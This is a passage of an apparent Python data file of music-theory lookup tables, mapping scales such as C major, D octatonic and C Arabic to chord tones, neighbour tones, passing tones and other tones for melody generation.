'FMaj7' : [ 'F', 'A', 'C', 'D', 'E', 'G' ],
'FsDim' : [ 'Fs', 'A', 'C', 'Ds', 'Fs' ],
'GDim' : [ 'G', 'As', 'Cs', 'E', 'G' ],
'GMinor' : [ 'G', 'As', 'D', 'Ds', 'F', 'A' ],
'CsDim' : [ 'Cs', 'E', 'G', 'As', 'Cs' ],
'DsDim' : [ 'Ds', 'Fs', 'A', 'C', 'Ds' ],
'EMaj7' : [ 'E', 'Gs', 'B', 'Cs', 'Ds', 'Fs' ],
'FsMaj7' : [ 'Fs', 'As', 'Cs', 'Ds', 'F', 'Gs' ],
'BMinor' : [ 'B', 'D', 'Fs', 'G', 'A', 'Cs' ],
'CMaj7' : [ 'C', 'E', 'G', 'A', 'B', 'D' ],
'AsMaj7' : [ 'As', 'D', 'F', 'G', 'A', 'C' ],
'D7' : [ 'D', 'Fs', 'A', 'B', 'C', 'E' ],
'Csm7' : [ 'Cs', 'E', 'Gs', 'A', 'B', 'Ds' ],
'FsMajor' : [ 'Fs', 'As', 'Cs', 'Ds', 'F', 'Gs' ],
'Am7' : [ 'A', 'C', 'E', 'F', 'G', 'B' ],
'DsMinor' : [ 'Ds', 'Fs', 'As', 'B', 'Cs', 'F' ],
}
NeighborTones = {
'GsMajor': {
'C': [ 'Cs', 'As' ],
'Gs': [ 'As', 'G' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'CMajor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
},
'DOct': {
'A': [ 'B', 'Gs' ],
'C': [ 'D', 'B' ],
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'A', 'Fs' ],
'D': [ 'Ds', 'B' ],
'F': [ 'Fs', 'Ds' ],
'B': [ 'D', 'A' ],
'Ds': [ 'F', 'D' ],
},
'BMinor': {
'A': [ 'B', 'G' ],
'Fs': [ 'G', 'E' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'Cs' ],
'G': [ 'A', 'Fs' ],
'B': [ 'Cs', 'A' ],
'Cs': [ 'D', 'B' ],
},
'CArabic': {
'C': [ 'Cs', 'B' ],
'B': [ 'C', 'Gs' ],
'Gs': [ 'B', 'G' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'E' ],
'Cs': [ 'E', 'C' ],
'E': [ 'F', 'Cs' ],
},
'CsMinor': {
'A': [ 'B', 'Gs' ],
'Fs': [ 'Gs', 'E' ],
'Gs': [ 'A', 'Fs' ],
'B': [ 'Cs', 'A' ],
'Cs': [ 'Ds', 'B' ],
'E': [ 'Fs', 'Ds' ],
'Ds': [ 'E', 'Cs' ],
},
'FsMinor': {
'A': [ 'B', 'Gs' ],
'B': [ 'Cs', 'A' ],
'Gs': [ 'A', 'Fs' ],
'D': [ 'E', 'Cs' ],
'Fs': [ 'Gs', 'E' ],
'Cs': [ 'D', 'B' ],
'E': [ 'Fs', 'D' ],
},
'GMajor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'Fs' ],
'Fs': [ 'G', 'E' ],
},
'COct': {
'A': [ 'C', 'G' ],
'As': [ 'C', 'A' ],
'C': [ 'Cs', 'A' ],
'Fs': [ 'G', 'E' ],
'E': [ 'Fs', 'Ds' ],
'G': [ 'A', 'Fs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'E', 'Cs' ],
},
'EMinor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'Fs' ],
'Fs': [ 'G', 'E' ],
},
'DMinor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
'As': [ 'C', 'A' ],
},
'FMajor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
'As': [ 'C', 'A' ],
},
'CMinor': {
'C': [ 'D', 'As' ],
'Gs': [ 'As', 'G' ],
'D': [ 'Ds', 'C' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Ds': [ 'F', 'D' ],
},
'CsOct': {
'As': [ 'Cs', 'Gs' ],
'B': [ 'Cs', 'As' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'Cs' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'E' ],
'Cs': [ 'D', 'As' ],
'Gs': [ 'As', 'G' ],
},
'CsMajor': {
'C': [ 'Cs', 'As' ],
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'DsMajor': {
'C': [ 'D', 'As' ],
'Gs': [ 'As', 'G' ],
'D': [ 'Ds', 'C' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Ds': [ 'F', 'D' ],
},
'GsMinor': {
'B': [ 'Cs', 'As' ],
'E': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'Fs': [ 'Gs', 'E' ],
'Cs': [ 'Ds', 'B' ],
'Gs': [ 'As', 'Fs' ],
'Ds': [ 'E', 'Cs' ],
},
'BMajor': {
'Fs': [ 'Gs', 'E' ],
'E': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'B': [ 'Cs', 'As' ],
'Cs': [ 'Ds', 'B' ],
'Gs': [ 'As', 'Fs' ],
'Ds': [ 'E', 'Cs' ],
},
'AsMinor': {
'C': [ 'Cs', 'As' ],
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'AsMajor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'D': [ 'Ds', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'A' ],
'Ds': [ 'F', 'D' ],
},
'DsMinor': {
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'B': [ 'Cs', 'As' ],
'Cs': [ 'Ds', 'B' ],
'Ds': [ 'F', 'Cs' ],
},
'AMajor': {
'A': [ 'B', 'Gs' ],
'Fs': [ 'Gs', 'E' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'Cs' ],
'B': [ 'Cs', 'A' ],
'Cs': [ 'D', 'B' ],
'Gs': [ 'A', 'Fs' ],
},
'FMinor': {
'C': [ 'Cs', 'As' ],
'Gs': [ 'As', 'G' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'EMajor': {
'A': [ 'B', 'Gs' ],
'B': [ 'Cs', 'A' ],
'Gs': [ 'A', 'Fs' ],
'Fs': [ 'Gs', 'E' ],
'Cs': [ 'Ds', 'B' ],
'E': [ 'Fs', 'Ds' ],
'Ds': [ 'E', 'Cs' ],
},
'CHMinor': {
'C': [ 'D', 'B' ],
'B': [ 'C', 'Gs' ],
'Gs': [ 'B', 'G' ],
'D': [ 'Ds', 'C' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'Ds': [ 'F', 'D' ],
},
'GMinor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'D': [ 'Ds', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'A' ],
'Ds': [ 'F', 'D' ],
},
'AMinor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
},
'FsMajor': {
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'B': [ 'Cs', 'As' ],
'Cs': [ 'Ds', 'B' ],
'Ds': [ 'F', 'Cs' ],
},
'DMajor': {
'A': [ 'B', 'G' ],
'B': [ 'Cs', 'A' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'Cs' ],
'G': [ 'A', 'Fs' ],
'Fs': [ 'G', 'E' ],
'Cs': [ 'D', 'B' ],
},
}
PassingTones = {
'GsMajor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'G', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'G' ], ['Cs', 'C', 'As'] ],
},
'CMajor': {
'A': [ [ 'B', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'F' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'DOct': {
'A': [ [ 'B', 'D' ], ['Gs', 'Fs', 'F'] ],
'C': [ [ 'D', 'Ds' ], ['B', 'A', 'Gs'] ],
'Fs': [ [ 'Gs', 'A' ], ['F', 'Ds', 'D'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['B', 'A', 'Gs'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'D', 'B'] ],
'B': [ [ 'D', 'Ds' ], ['A', 'Gs', 'Fs'] ],
'Ds': [ [ 'F', 'Fs' ], ['D', 'B', 'A'] ],
},
'BMinor': {
'A': [ [ 'B', 'Cs' ], ['G', 'Fs', 'E'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'Cs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'Cs', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'G', 'Fs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
},
'CArabic': {
'C': [ [ 'Cs', 'E' ], ['B', 'Gs', 'G'] ],
'B': [ [ 'C', 'Cs' ], ['Gs', 'G', 'F'] ],
'Gs': [ [ 'B', 'C' ], ['G', 'F', 'E'] ],
'G': [ [ 'Gs', 'B' ], ['F', 'E', 'Cs'] ],
'F': [ [ 'G', 'Gs' ], ['E', 'Cs', 'C'] ],
'Cs': [ [ 'E', 'F' ], ['C', 'B', 'Gs'] ],
'E': [ [ 'F', 'G' ], ['Cs', 'C', 'B'] ],
},
'CsMinor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'Ds', 'Cs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'Ds'] ],
'B': [ [ 'Cs', 'Ds' ], ['A', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'A', 'Gs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
},
'FsMinor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'Gs', 'Fs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'D', 'Cs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'Gs'] ],
'E': [ [ 'Fs', 'Gs' ], ['D', 'Cs', 'B'] ],
},
'GMajor': {
'A': [ [ 'B', 'C' ], ['G', 'Fs', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'Fs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'COct': {
'A': [ [ 'C', 'Cs' ], ['G', 'Fs', 'E'] ],
'As': [ [ 'C', 'Cs' ], ['A', 'G', 'Fs'] ],
'C': [ [ 'Cs', 'Ds' ], ['A', 'G', 'Fs'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'Ds', 'Cs'] ],
'E': [ [ 'Fs', 'G' ], ['Ds', 'Cs', 'C'] ],
'G': [ [ 'A', 'C' ], ['Fs', 'E', 'Ds'] ],
'Cs': [ [ 'Ds', 'E' ], ['C', 'A', 'G'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'C', 'A'] ],
},
'EMinor': {
'A': [ [ 'B', 'C' ], ['G', 'Fs', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'Fs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'DMinor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['As', 'A', 'G'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
'D': [ [ 'E', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
},
'FMajor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['As', 'A', 'G'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
'D': [ [ 'E', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
},
'CMinor': {
'C': [ [ 'D', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['Gs', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'CsOct': {
'As': [ [ 'Cs', 'D' ], ['Gs', 'G', 'F'] ],
'B': [ [ 'Cs', 'D' ], ['As', 'Gs', 'G'] ],
'E': [ [ 'F', 'G' ], ['D', 'Cs', 'As'] ],
'D': [ [ 'E', 'F' ], ['Cs', 'As', 'Gs'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['E', 'D', 'Cs'] ],
'Cs': [ [ 'D', 'E' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'Cs' ], ['G', 'F', 'E'] ],
},
'CsMajor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'C' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'C', 'As'] ],
},
'DsMajor': {
'C': [ [ 'D', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['Gs', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'GsMinor': {
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'Fs': [ [ 'Gs', 'As' ], ['E', 'Ds', 'Cs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'As', 'Gs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'E', 'Ds'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'BMajor': {
'Fs': [ [ 'Gs', 'As' ], ['E', 'Ds', 'Cs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'As', 'Gs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'E', 'Ds'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'AsMinor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'C' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'C', 'As'] ],
},
'AsMajor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'C': [ [ 'D', 'Ds' ], ['As', 'A', 'G'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'A' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'DsMinor': {
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'F' ], ['B', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'AMajor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'D', 'Cs'] ],
'E': [ [ 'Fs', 'Gs' ], ['D', 'Cs', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'Gs', 'Fs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'Gs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
},
'FMinor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'G', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'G' ], ['Cs', 'C', 'As'] ],
},
'EMajor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'Ds' ], ['A', 'Gs', 'Fs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'Ds'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'Ds', 'Cs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'A', 'Gs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
},
'CHMinor': {
'C': [ [ 'D', 'Ds' ], ['B', 'Gs', 'G'] ],
'B': [ [ 'C', 'D' ], ['Gs', 'G', 'F'] ],
'Gs': [ [ 'B', 'C' ], ['G', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'B', 'Gs'] ],
'G': [ [ 'Gs', 'B' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'D', 'C'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'B'] ],
},
'GMinor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'C': [ [ 'D', 'Ds' ], ['As', 'A', 'G'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'A' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'AMinor': {
'A': [ [ 'B', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'F' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'FsMajor': {
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'F' ], ['B', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'DMajor': {
'A': [ [ 'B', 'Cs' ], ['G', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'G', 'Fs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'Cs', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'Cs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
},
}
OtherTones = {
'GsMajor': {
'C': [ 'F'],
'Gs': [ 'Cs'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'G'],
'Ds': [ 'Gs'],
},
'CMajor': {
'A': [ 'D'],
'C': [ 'F'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'B'],
},
'DOct': {
'A': [ 'Ds'],
'C': [ 'Fs'],
'Fs': [ 'B'],
'Gs': [ 'D'],
'D': [ 'Fs'],
'F': [ 'A'],
'B': [ 'F'],
'Ds': [ 'Gs'],
},
'BMinor': {
'A': [ 'D'],
'Fs': [ 'B'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'Cs'],
'B': [ 'E'],
'Cs': [ 'Fs'],
},
'CArabic': {
'C': [ 'F'],
'B': [ 'E'],
'Gs': [ 'Cs'],
'G': [ 'C'],
'F': [ 'B'],
'Cs': [ 'G'],
'E': [ 'Gs'],
},
'CsMinor': {
'A': [ 'Ds'],
'Fs': [ 'B'],
'Gs': [ 'Cs'],
'B': [ 'E'],
'Cs': [ 'Fs'],
'E': [ 'A'],
'Ds': [ 'Gs'],
},
'FsMinor': {
'A': [ 'D'],
'B': [ 'E'],
'Gs': [ 'Cs'],
'D': [ 'Gs'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
'E': [ 'A'],
},
'GMajor': {
'A': [ 'D'],
'C': [ 'Fs'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'Fs': [ 'B'],
},
'COct': {
'A': [ 'Ds'],
'As': [ 'E'],
'C': [ 'E'],
'Fs': [ 'C'],
'E': [ 'A'],
'G': [ 'Cs'],
'Cs': [ 'Fs'],
'Ds': [ 'G'],
},
'EMinor': {
'A': [ 'D'],
'C': [ 'Fs'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'Fs': [ 'B'],
},
'DMinor': {
'A': [ 'D'],
'C': [ 'F'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'E'],
},
'FMajor': {
'A': [ 'D'],
'C': [ 'F'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'E'],
},
'CMinor': {
'C': [ 'F'],
'Gs': [ 'D'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'Gs'],
},
'CsOct': {
'As': [ 'E'],
'B': [ 'F'],
'E': [ 'Gs'],
'D': [ 'G'],
'G': [ 'Cs'],
'F': [ 'As'],
'Cs': [ 'F'],
'Gs': [ 'D'],
},
'CsMajor': {
'C': [ 'F'],
'Fs': [ 'C'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'DsMajor': {
'C': [ 'F'],
'Gs': [ 'D'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'Gs'],
},
'GsMinor': {
'B': [ 'E'],
'E': [ 'As'],
'As': [ 'Ds'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
'Gs': [ 'Cs'],
'Ds': [ 'Gs'],
},
'BMajor': {
'Fs': [ 'B'],
'E': [ 'As'],
'As': [ 'Ds'],
'B': [ 'E'],
'Cs': [ 'Fs'],
'Gs': [ 'Cs'],
'Ds': [ 'Gs'],
},
'AsMinor': {
'C': [ 'F'],
'Fs': [ 'C'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'AsMajor': {
'A': [ 'D'],
'C': [ 'F'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'A'],
},
'DsMinor': {
'Fs': [ 'B'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'B': [ 'F'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'AMajor': {
'A': [ 'D'],
'Fs': [ 'B'],
'E': [ 'A'],
'D': [ 'Gs'],
'B': [ 'E'],
'Cs': [ 'Fs'],
'Gs': [ 'Cs'],
},
'FMinor': {
'C': [ 'F'],
'Gs': [ 'Cs'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'G'],
'Ds': [ 'Gs'],
},
'EMajor': {
'A': [ 'Ds'],
'B': [ 'E'],
'Gs': [ 'Cs'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
'E': [ 'A'],
'Ds': [ 'Gs'],
},
'CHMinor': {
'C': [ 'F'],
'B': [ 'Ds'],
'Gs': [ 'D'],
